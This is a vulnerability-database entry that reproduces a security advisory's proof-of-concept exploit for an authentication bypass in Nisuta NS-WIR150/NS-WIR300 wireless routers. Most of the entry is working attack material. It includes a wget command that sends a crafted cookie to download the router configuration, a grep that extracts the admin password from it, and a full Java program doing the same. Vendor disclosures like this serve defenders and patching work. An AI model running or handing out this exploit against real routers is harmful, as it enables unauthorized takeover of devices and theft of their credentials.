Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Nisuta NS-WIR150/NS-WIR300无线路由器管理Web接口访问绕过漏洞

🗓️ 10 Jan 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 36 Views

Nisuta NS-WIR150/NS-WIR300 Wireless Router Web Interface Bypass Vulnerabilit

Code

                                                PoC Exploit:
 
An unauthenticated remote attacker on the WAN and LAN interfaces can perform any action available on the router's remote management web interface, as an example, the following command will bypass authentication and download the router's configuration which includes the current remote management web interface password among other confidential information:
 
$ wget --header="Cookie: :language=en" http://192.168.2.1/cgi-bin/DownloadCfg/config.cfg -t 1
 
The password is in the 'http_passwd' variable:
 
$ grep http_passwd config.cfg
http_passwd=mysecretpassword
$
 
The attacker can now conveniently login into the remote management web interface with full control and perform changes, obtain information, etc. 
 
Again, the password is not needed, the attacker can just set the cookie 'admin:language=en' in his browser to gain access to the management interface or  perform other actions directly, this is just an example.
 
Custom implementation of the PoC exploit:
 
// Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers Remote Management Web Interface Authentication Bypass Vulnerability 
// Amplia Security - Amplia Security Research Advisory (AMPLIA-ARA050913)
// PoC exploit - dumps the router's configuration files which includes the management interface password
// and other information
// compile: javac poc.java
// run: java poc > router.cfg
 
import java.net.URL;
import java.net.URLConnection;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
 
 
public class poc {
 
    public static void main(String[] args)
    {
 
        try { 
            URL url = new URL("http://192.168.2.1/cgi-bin/DownloadCfg/config.cfg");
            URLConnection conn = url.openConnection();
            conn.setRequestProperty("Cookie", ":language=en");
 
            BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream()));
            String line;
            while ((line = rd.readLine()) != null) {
                   System.out.println(line);
            }
         
        } catch(Exception e) {
 
            e.printStackTrace();
        }
     
         
    }
};

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Jan 2014 00:00Current
7.1High risk
Vulners AI Score7.1
nisutawireless routersweb interfacebypassvulnerabilityremote attackcookieauthenticationpatchupgrade
36